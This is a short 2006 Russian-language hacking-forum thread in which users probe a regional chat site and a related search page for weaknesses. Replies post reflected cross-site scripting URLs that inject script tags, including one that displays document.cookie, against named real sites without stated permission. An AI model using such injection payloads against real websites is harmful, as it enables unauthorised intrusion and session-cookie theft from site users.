Чаты Проверьте чат на уязвимость (dmbchat.ru)

Discussion in 'Веб-уязвимости' started by Noth!nG, 18 May 2006.

  1. Noth!nG

    Noth!nG Elder - Старейшина

    Joined:
    8 Mar 2006
    Messages:
    31
    Likes Received:
    4
    Reputations:
    0
  2. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    В поисковике на самом чате xss :rolleyes: :
    _http://search.novgorod.ru/search.php?q=%3Cscript%3Ealert%28%27SLIP%27%29%3C%2Fscript%3E&where=1
    Хоть бы ник с пассом выложил..)
     
  3. Антошка2003

    Антошка2003 Elder - Старейшина

    Joined:
    3 Apr 2005
    Messages:
    534
    Likes Received:
    66
    Reputations:
    49
    невидимой символ там как то давно регил, а так, значительных болше не находил.
     
  4. TAZMAD

    TAZMAD New Member

    Joined:
    19 Nov 2004
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    В чат сам не заходил, что снаружи обнаружил вот:
    По чату:
    http://www.dmbchat.ru/menu/list.php?nick="><script>alert(document.cookie)</script>

    В поиске: http://www.dmbchat.ru/menu/list.php?nick="><script>alert(document.cookie)</script>
     
    #4 TAZMAD, 19 May 2006
    Last edited: 19 May 2006
  5. Desr0w

    Desr0w Banned

    Joined:
    1 Feb 2006
    Messages:
    370
    Likes Received:
    166
    Reputations:
    45
    Noth!nG,чат случаем не Новгородский?
     
  6. Noth!nG

    Noth!nG Elder - Старейшина

    Joined:
    8 Mar 2006
    Messages:
    31
    Likes Received:
    4
    Reputations:
    0
    Я там даже не зареген, просто знакомые попросили посмотреть что там к чему, а у меня сейчас времени нет вообще, целыми днями на работе.
    Случаем Новгородский.)

    Спасиб :) ;)